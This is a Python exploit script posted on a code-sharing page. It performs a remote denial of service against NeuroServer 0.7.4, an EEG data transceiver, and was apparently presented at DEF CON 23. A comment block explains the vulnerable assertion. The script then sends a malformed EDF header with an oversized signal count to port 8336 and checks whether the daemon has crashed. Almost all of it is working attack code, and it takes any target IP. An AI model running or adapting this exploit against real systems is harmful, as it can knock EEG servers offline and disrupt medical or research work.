扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 |
#!/usr/bin/env python # # NeuroServer 0.7.4 Remote DoS # # Shown at DEF CON 23 (BioHacking Village) # Brain Waves Surfing - (In)Security in EEG (Electroencephalography) Technologies # Slides: http://goo.gl/44r1HH # # NeuroServer is an EEG (Electroencephalography) TCP/IP Transceiver # http://openeeg.sourceforge.net/doc/sw/NeuroServer/ # # Neuroserver mediates between the raw EEG devices and all the various EEG # applications that the user may wish to run to analyse the incoming EEG data. # Data is transmitted using TCP/IP, which means that the EEG data can just as # easily pass over a network (or even the internet) as stay on the same machine. # Standard EDF is used for header information and for file storage. # The server is designed to run on Windows and Linux. # #------------------------------------------------------------------------------ # # nsd (NeuroServer Daemon) stops if any assertion is triggered inside isValidREDF() at # ~/NeuroServer-0.7.4/src/openedf.c: # ... # assert(isValidREDF(result)); # ... # int isValidREDF(const struct EDFDecodedConfig *cfg) # { # int i; # if (cfg->hdr.dataRecordSeconds != 1.0) { # setLastError("The data record must be exactly 1 second, not %f.", #cfg->hdr.dataRecordSeconds); # return 0; # } # if (cfg->hdr.dataRecordChannels < 1) { # setLastError("The data record must have at least one channel."); # return 0; # } # if (cfg->chan[0].sampleCount < 1) { # setLastError("Channel 0 must have at least one sample."); # return 0; # } # for (i = 1; i < cfg->hdr.dataRecordChannels; ++i) { # if (cfg->chan[i].sampleCount != cfg->chan[0].sampleCount) { # setLastError("Channel %d has %d samples, but channel 0 has %d.These must be the same.", cfg->chan[i].sampleCount, cfg->chan[0].sampleCount); # return 0; # } # } # return 1; # } # import socket import time import sys # Malformed EDF header # Spec: http://www.edfplus.info/specs/edf.html EDF= "0 " # Version EDF += "Alejandro Hernandez " # Patient Identification EDF += "NeuroSky MindWave " # Recording Identification EDF += "07.04.1520.55.28768 EDF+C " # Startdate of Recording EDF += "29" # Number of Data Records EDF += "1 " # Duration of a Data Record in Seconds EDF += "1337" # Number of Signals. This value triggers the DoS: assert(cfg->hdr.dataRecordChannels < MAXCHANNELS); EDF += "Electrode EDF Annotations "# Labels and other data per channel EDF += "-32768-132767 1 -32768-3276832767 32767 " # PhysiMin PhysiMax DigiMin DigiMax if len(sys.argv) != 2: print 'Usage: ' + __file__ + ' <NeuroServer IP>' sys.exit(1) print r''' __,--"""""""""--,. _ -\'"_\ ^-,_ ,-" _/\_ ,/\\ ,'/_| \ / _____,--""" / ) \ / / / ( | |//) | | /NeuroServer 0.7.4 Remote DoS \ ( (_/\) /\ \\_____,===="""/| \/"/"" | \__,-" |___,-'--------'"| "`------"" --" ,-'/ / ---"/ \___/__,-----,___ ) \ ,--'"============""""-'" "-'" ||=================/ /___\===============/ /|=============/" \ \_________,-" | | | | ''' neuroserver = (sys.argv[1], 8336) s = socket.socket() print '|- Connecting to %s on port %s\n' % neuroserver try: s.connect(neuroserver) except Exception, e: print '|- Can\'t connect to %s:%d' % neuroserver print '|- Exception: %s' % (e) sys.exit(1) print '|- Entering in EEG role. NeuroServers\' response:' s.send('eeg\n') # EEG role in NeuroServer print '----------------------------------------------' print s.recv(16).strip('\n') print '----------------------------------------------' print '|- Sending Malformed EDF header (%d bytes):' % len(EDF) print '----------------------------------------------' print EDF print '----------------------------------------------\n' s.send('setheader ' + EDF + '\n') time.sleep(4) print '|- NeuroServer should be dead now. Connecting...\n' try: s = socket.socket() s.connect(neuroserver) except Exception, e: print '|- NeuroServer is down !' print '|- Exception: %s' % (e) else: print '|- NeuroServer is still alive :-\, try again...' finally: s.close() sys.exit(0); |
体验盒子
